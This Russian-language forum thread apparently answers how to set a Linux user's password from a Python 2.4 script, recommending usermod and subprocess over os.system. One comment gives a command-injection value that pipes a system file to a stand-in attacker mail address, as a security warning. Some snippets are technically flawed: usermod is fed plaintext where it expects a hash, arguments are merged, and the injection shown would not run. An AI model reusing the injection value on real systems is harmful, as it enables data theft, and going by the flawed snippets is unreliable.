Как в скрипт поставить ввод пароля passwd?

Question

[Reshh4rd]

В python2.4 скрипте надо задать для пользователя usertest пароль, допустим 123:

passwd = "123"
os.system(passwd usertest)

На что OS выдает:

Changing password for usertest.
New password:

Как подставить после приглашения ввода пароля автоматически пароль из переменной . (Можно и не из переменной, главное, чтобы можно было этот процесс автоматизировать)

Comments

[Roman K]

Единственный вопрос, который на тостере прилично задавать про python2.4 — это "как обновить python2.4 до python3.8?"

Answer 1

[GavriKos]

Передать пароль параметрами passwd
Т.е. это не к питону вопросы, а именно к passwd.
Можно использовать другие тулзы, если они есть в системе, например:
usermod --password PASSWORD USERNAME

Comments

[Nurbol Suleimenov]

Reshh4rd, GavriKos прав. Возьму смелость добавить:

• Согласно PEP 324, os.system считается устаревшим еще с версии 2.4, и заменен стандартным модулем subprocess.
  

  import subprocess
  subprocess.call(["usermod", "--password PASSWORD", "USERNAME"])

  
  
• Работая напрямую с оболочкой, есть опасность породить дыру в безопасности. Можно использовать, но осторожно. Простой пример:
  

  password = '123; cat /etc/password | mail hacker@mail.ru'  # Внедренная команда
  subprocess.call(["usermod", "--password %s" % password, "USERNAME"])

  
  
  

[Reshh4rd]

Nurbol Suleimenov, я изначально свои скрипты писал , используя subprocess, но сейчас перехожу на os.system. Получается зря? Если работа напрямую с OS несекьюрна, чем же лучше?
Решил проблему через usermod в os.system

[Nurbol Suleimenov]

Reshh4rd,

Получается зря?

Да, я уже приводил ссылку, что subprocess пришел на замену os.system.
Т.к. методы работы с os.system крайне скудны.

• Она не возвращает статус выполнения, и Вы не узнаете о том, что операция не выполнилась.
  
• Она не возвращает результат выполнения, а subprocess может получить вывод команды. И дальше использовать его как данные для обработки или для интеллектуальной проверки об успешности выполнения
  
• subprocess позволяет писать скрипты, которые можно использовать с UNIX pipes. В таком стиле:

  cat /etc/password | grep user | your_script.py | cat

  
  
• И немаловажно, что os.system оставлен только для сохранения совместимости и не будет улучшаться.
  

В конечном счете, Вам решать что использовать.

Если работа напрямую с OS несекьюрна, чем же лучше?

Как я уже писал, что можно использовать, но осторожно. Это я про то, что
когда Вы смешиваете строку для отправки в оболочку (shell) с переменной,
то появляется потенциальная дыра. Следует об этом помнить, если Вы пишите
к примеру web приложение, которая получает данные извне.

Answer 2

[Руслан Федосеев]

команда passwd особенная. И принимать пароль как аргумент - не ххочет. Почитайте документацию